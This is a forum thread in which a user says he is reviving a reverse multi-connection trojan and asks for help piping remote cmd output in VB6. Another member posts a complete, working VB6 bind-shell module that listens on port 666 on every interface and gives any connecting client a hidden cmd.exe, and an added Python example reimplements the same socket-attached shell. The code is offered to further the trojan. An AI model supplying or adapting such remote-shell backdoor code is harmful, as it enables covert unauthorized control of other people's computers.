Help with CMD pipe in VB6

Started by hepy_92, 12 December 2009, 05:06 AM


hepy_92

hi
a few years ago I wrote a reverse multi-connection trojan
now I've picked it up again since I want to use it again, and I'm working on being able to send commands to the remote cmd and get back what happens (e.g. I type dir C:\ and it returns the result, listing the files in C:\)
for this I found this cmd pipe code

'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finished.

Option Explicit
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
  nLength As Long
  lpSecurityDescriptor As Long
  bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
  hProcess As Long
  hThread As Long
  dwProcessId As Long
  dwThreadId As Long
End Type

Private Type STARTUPINFO
  cb As Long
  lpReserved As Long
  lpDesktop As Long
  lpTitle As Long
  dwX As Long
  dwY As Long
  dwXSize As Long
  dwYSize As Long
  dwXCountChars As Long
  dwYCountChars As Long
  dwFillAttribute As Long
  dwFlags As Long
  wShowWindow As Integer
  cbReserved2 As Integer
  lpReserved2 As Long      'a pointer, so Long (not Byte): Len(sui) must come out as 68
  hStdInput As Long
  hStdOutput As Long
  hStdError As Long
End Type

'Not used by this example; kept for completeness (ReadFile gets a NULL lpOverlapped).
Private Type OVERLAPPED
    Internal As Long
    InternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
  Command1.Enabled = False
  Redirect Text1.Text, Text2
  Command1.Enabled = True
End Sub

Private Sub Form_Load()
    Text1.Text = "ping"
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
  If Command1.Enabled = False Then Cancel = True
End Sub

'Runs cmdLine with its stdout and stderr on a pipe and appends everything it
'writes to objTarget (a multiline TextBox). cmdLine must name an executable:
'cmd.exe built-ins such as dir or cd only work as "cmd /c dir C:\", because
'CreateProcess cannot start "dir" on its own. Use /c rather than /k so that
'cmd.exe exits when the command is done and the pipe reaches end-of-file.
Sub Redirect(cmdLine As String, objTarget As Object)
  Dim pa As SECURITY_ATTRIBUTES
  Dim pra As SECURITY_ATTRIBUTES
  Dim tra As SECURITY_ATTRIBUTES
  Dim pi As PROCESS_INFORMATION
  Dim sui As STARTUPINFO
  Dim hRead As Long
  Dim hWrite As Long
  Dim bRead As Long
  Dim lpBuffer(1024) As Byte

  'The pipe handles must be inheritable, otherwise the child cannot use hWrite.
  pa.nLength = Len(pa)
  pa.lpSecurityDescriptor = 0
  pa.bInheritHandle = True

  pra.nLength = Len(pra)
  tra.nLength = Len(tra)

  If CreatePipe(hRead, hWrite, pa, 0) = 0 Then Exit Sub

  sui.cb = Len(sui)
  GetStartupInfo sui
  sui.hStdOutput = hWrite
  sui.hStdError = hWrite
  sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
  sui.wShowWindow = SW_HIDE

  'lpEnvironment must be a NULL pointer (ByVal 0&), not a Variant Null,
  'so the child inherits this process's environment.
  If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, ByVal 0&, vbNullString, sui, pi) <> 0 Then
    'Close OUR copy of the write end right after the spawn. ReadFile only
    'reports end-of-file once every write handle is closed; keeping this one
    'open (as the original did, inside the loop) hangs the first ReadFile
    'forever on a child that prints nothing.
    CloseHandle hWrite
    hWrite = 0
    SetWindowText objTarget.hwnd, ""
    Do
      Erase lpBuffer
      'Read at most 1023 bytes so lpBuffer(bRead) stays 0 and the buffer is a
      'valid null-terminated string for EM_REPLACESEL.
      If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) = 0 Then Exit Do
      If bRead = 0 Then Exit Do
      SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
      SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
      DoEvents
    Loop
    CloseHandle pi.hThread
    CloseHandle pi.hProcess
  End If

  If hWrite <> 0 Then CloseHandle hWrite
  CloseHandle hRead
End Sub


to send commands like cd or dir you have to put "cmd /k" in front (e.g. cmd /k dir C:\), don't ask me why (if anyone can explain why it has to be done, I'd appreciate it hahaha)
but anyway, the problem is that when I send a command like dir or cd, I get this error:
Quote:
Run-time error '9':
Subscript out of range
help please! thanks in advance

cobein

There is a way to do this properly, which is to hook stdio up to a socket; later, if I have a moment, I'll do it and post it.
http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.

hepy_92

ok, that would be much appreciated!
any other ideas?
thanks ;D

hepy_92

how do I know which timer is the one that's "out of range"? and what does "out of range" mean? sorry if my question is a bit noob, but I haven't touched VB6 in a long time
Quote:
Run-time error '9':
Subscript out of range

thanks :)

shaggikpo

on which line exactly does the error occur?

cobein

OK, here's the example

'---------------------------------------------------------------------------------------
' Module      : mMS
' DateTime    : 12/13/2009 20:16
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advancevb.com.ar
' Purpose     : Remote shell
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : NGS - Writing small shellcode paper
'
' History     : 12/13/2009 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Const INFINITE              As Long = &HFFFFFFFF
Private Const INVALID_SOCKET        As Long = -1
Private Const SOCK_STREAM           As Long = 1
Private Const AF_INET               As Long = 2
Private Const IPPROTO_TCP           As Long = 6
Private Const STARTF_USESTDHANDLES  As Long = &H100
Private Const STARTF_USESHOWWINDOW  As Long = &H1
Private Const SW_HIDE               As Long = 0

Private Const WSADESCRIPTION_LEN    As Long = 257
Private Const WSASYS_STATUS_LEN     As Long = 129

Public Type WSAData
    wVersion                As Integer
    wHighVersion            As Integer
    szDescription           As String * WSADESCRIPTION_LEN
    szSystemStatus          As String * WSASYS_STATUS_LEN
    iMaxSockets             As Integer
    iMaxUdpDg               As Integer
    lpVendorInfo            As Long
End Type

Public Type sockaddr_in
    sin_family              As Integer
    sin_port                As Integer
    sin_addr                As Long
    sin_zero(1 To 8)        As Byte
End Type

Private Type SECURITY_ATTRIBUTES
    nLength                 As Long
    lpSecurityDescriptor    As Long
    bInheritHandle          As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess                As Long
    hThread                 As Long
    dwProcessId             As Long
    dwThreadId              As Long
End Type

Private Type STARTUPINFO
    cb                      As Long
    lpReserved              As Long     'pointers: declared as Long so the struct is 68 bytes
    lpDesktop               As Long
    lpTitle                 As Long
    dwX                     As Long
    dwY                     As Long
    dwXSize                 As Long
    dwYSize                 As Long
    dwXCountChars           As Long
    dwYCountChars           As Long
    dwFillAttribute         As Long
    dwFlags                 As Long
    wShowWindow             As Integer
    cbReserved2             As Integer
    lpReserved2             As Long
    hStdInput               As Long
    hStdOutput              As Long
    hStdError               As Long
End Type

Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long
Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long
'namelen is passed by value in Winsock; ByRef would hand bind() a pointer as the length.
Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByVal namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function htons Lib "ws2_32.dll" (ByVal hostshort As Long) As Integer
Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long
Private Declare Function closesocket Lib "ws2_32.dll" (ByVal s As Long) As Long

Public Sub Main()
    Dim lSock                   As Long
    Dim lClient                 As Long
    Dim tSA                     As sockaddr_in
    Dim lSALen                  As Long
    Dim tWD                     As WSAData
    Dim tSTARTUPINFO            As STARTUPINFO
    Dim tPROCESS_INFORMATION    As PROCESS_INFORMATION
    Dim tSECURITY_ATTRIBUTES    As SECURITY_ATTRIBUTES

    Const PORT As Long = 666

    If WSAStartup(&H101, tWD) <> 0 Then Exit Sub

    'WSASocket with dwFlags = 0 gives a plain (non-overlapped) socket. cmd.exe
    'does synchronous ReadFile/WriteFile on its std handles, which does not
    'work on the overlapped sockets that socket() creates by default.
    lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, 0&)

    If lSock <> INVALID_SOCKET Then

        With tSA
            .sin_family = AF_INET
            .sin_port = htons(PORT)
            .sin_addr = 0                   'INADDR_ANY: listens on every interface
        End With

        If bind(lSock, tSA, Len(tSA)) = 0 Then

            If listen(lSock, 1) = 0 Then

                lSALen = Len(tSA)
                lClient = accept(lSock, tSA, lSALen)    'blocks until a client connects

                If lClient <> INVALID_SOCKET Then

                    tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES)

                    'Hand the connected socket to cmd.exe as all three std
                    'handles; bInheritHandles = True is what makes the socket
                    'handle valid inside the child.
                    With tSTARTUPINFO
                        .cb = Len(tSTARTUPINFO)
                        .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
                        .wShowWindow = SW_HIDE
                        .hStdInput = lClient
                        .hStdOutput = lClient
                        .hStdError = lClient
                    End With

                    'lpEnvironment: ByVal 0& is a NULL pointer (inherit ours).
                    'A plain 0& would pass a pointer to four zero bytes, i.e.
                    'an empty environment block, and cmd would start with no
                    'PATH, COMSPEC or anything else.
                    If CreateProcessA(vbNullString, "cmd", _
                       tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                       ByVal 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then

                        Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE)
                        Call CloseHandle(tPROCESS_INFORMATION.hThread)
                        Call CloseHandle(tPROCESS_INFORMATION.hProcess)

                    End If

                    Call closesocket(lClient)
                End If
            End If
        End If

        Call closesocket(lSock)
    End If

    Call WSACleanup
End Sub


A few things to keep in mind.

1- the code will freeze waiting for a connection
2- there are many structures that could be left out, but I left them so the example is clearer.
3- you can connect using telnet (open localhost 666); on Vista, and I don't know about 7, telnet isn't installed by default.
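The two techniques in this thread side by side, as an added example that is not code from the thread: hepy_92's Redirect() (child stdout/stderr on a pipe, read to end-of-file) and cobein's mMS (child stdin/stdout/stderr on an accepted socket). It is in Python rather than VB6 so it runs as-is. capture_via_pipe() and shell_wrap() run on Windows and POSIX; attach_shell(), run_through_socket_shell() and bind_shell() assume a POSIX host with /bin/sh, because Python's subprocess cannot pass a Windows SOCKET handle as a std handle (on Windows that is exactly the STARTUPINFO.hStdInput/hStdOutput/hStdError assignment in the VB6 module). All function names are this example's own and the sample command lines are made up.

```python
"""Child stdio on a pipe (as in Redirect) and on a socket (as in mMS).

Added example, not code from the thread.  The socket part assumes a POSIX
host with /bin/sh; on Windows the same thing is done by putting the SOCKET
into STARTUPINFO.hStdInput/hStdOutput/hStdError, as the VB6 module does.
"""
import os
import socket
import subprocess
import sys


def shell_wrap(cmdline: str) -> list:
    """argv that runs a shell built-in such as dir, cd or echo.

    CreateProcess/execve only start executables; dir and cd are interpreted
    by cmd.exe itself (cd and echo by sh), which is why the thread's pipe
    version needed a cmd prefix.  /c and -c run the line and exit, so the
    pipe reaches end-of-file; /k would keep cmd.exe waiting for more input.
    """
    if sys.platform == "win32":
        return ["cmd", "/c", cmdline]
    return ["/bin/sh", "-c", cmdline]


def capture_via_pipe(argv: list) -> str:
    """Run argv with stdout and stderr on one pipe; return everything it wrote.

    Same sequence as the VB6 Redirect(): CreatePipe, CreateProcess with
    STARTF_USESTDHANDLES, then ReadFile until end-of-file.
    """
    read_end, write_end = os.pipe()
    try:
        proc = subprocess.Popen(argv, stdin=subprocess.DEVNULL,
                                stdout=write_end, stderr=write_end)
    except OSError:
        os.close(read_end)
        raise
    finally:
        # Drop OUR copy of the write end as soon as the child has it.  A pipe
        # only reports end-of-file once every write handle is closed; while
        # the parent keeps one, a child that prints nothing hangs the reader.
        os.close(write_end)
    chunks = []
    while True:
        chunk = os.read(read_end, 4096)   # blocks; b"" is EOF (ReadFile failing)
        if not chunk:
            break
        chunks.append(chunk)
    os.close(read_end)
    proc.wait()
    return b"".join(chunks).decode(errors="replace")


def attach_shell(sock: socket.socket, shell: str = "/bin/sh") -> subprocess.Popen:
    """Spawn shell with stdin, stdout and stderr all on sock (POSIX).

    cobein's trick: the child never calls recv/send; every read and write on
    its standard handles goes straight over the connection.
    """
    fd = sock.fileno()
    return subprocess.Popen([shell], stdin=fd, stdout=fd, stderr=fd,
                            close_fds=True)   # nothing else leaks into the shell


def run_through_socket_shell(script: str, shell: str = "/bin/sh") -> str:
    """Drive attach_shell() over a local socketpair; return the shell's output.

    Stands in for the telnet client in the thread.
    """
    client, child_end = socket.socketpair()
    proc = attach_shell(child_end, shell)
    child_end.close()                  # parent copy gone, or recv() never sees EOF
    client.sendall(script.encode())
    client.shutdown(socket.SHUT_WR)    # EOF on the shell's stdin makes it exit
    chunks = []
    while True:
        data = client.recv(4096)
        if not data:
            break
        chunks.append(data)
    client.close()
    proc.wait()
    return b"".join(chunks).decode(errors="replace")


def bind_shell(host: str = "127.0.0.1", port: int = 0, shell: str = "/bin/sh") -> int:
    """bind, listen, accept ONE client, hand it a shell, wait: Main() of mMS.

    Defaults to loopback and an OS-chosen port; the VB6 module listens on
    INADDR_ANY:666, i.e. on every interface.  Returns the shell's exit code.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as lsock:
        lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        lsock.bind((host, port))
        lsock.listen(1)
        print("listening on %s:%d" % lsock.getsockname(), file=sys.stderr)
        conn, _peer = lsock.accept()   # blocks, like the VB6 accept()
    with conn:                          # listener already closed: not inherited
        proc = attach_shell(conn, shell)
    return proc.wait()


if __name__ == "__main__":
    print(capture_via_pipe(shell_wrap("cd / && pwd")), end="")
    print(run_through_socket_shell("echo hello from the socket shell\n"), end="")
```

Two points the code makes explicit. First, dir and cd are cmd.exe built-ins, not executables, so CreateProcess cannot start them on their own; a cmd prefix is needed, and /c rather than /k makes cmd.exe exit when the command ends so the reader sees end-of-file. Second, the parent has to close its own copy of whatever the child writes to (the pipe's hWrite, or the accepted socket) right after spawning; as long as it holds one, the read side never reaches end-of-file and a child that prints nothing hangs the reader. Also note that CreateProcess does not expand %VAR% syntax, so a VB6 caller that wants the COMSPEC shell has to pass Environ$("COMSPEC") rather than the literal "%COMSPEC%".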

Karcrack

Very nice code ;D
Just one thing:
                    If CreateProcessA(vbNullString, "cmd", _
                       tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                       0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then

Instead of 'cmd' I think '%COMSPEC%' would be better ;)

YST

Quote from: Karcrack on 14 December 2009, 16:59
Very nice code ;D
Just one thing:
                    If CreateProcessA(vbNullString, "cmd", _
                       tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                       0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then

Instead of 'cmd' I think '%COMSPEC%' would be better ;)

On which PC wouldn't it be cmd? :xD


I taught Kayser to use objects in ASM

hepy_92

I didn't understand what you posted at all :S
sorry for my ignorance, I'm a newbie... but what is that?

Karcrack

Quote from: YST on 14 December 2009, 20:23
On which PC wouldn't it be cmd? :xD
Any version of W$ before XP :P
Anyway, environment variables ftw!!! :xD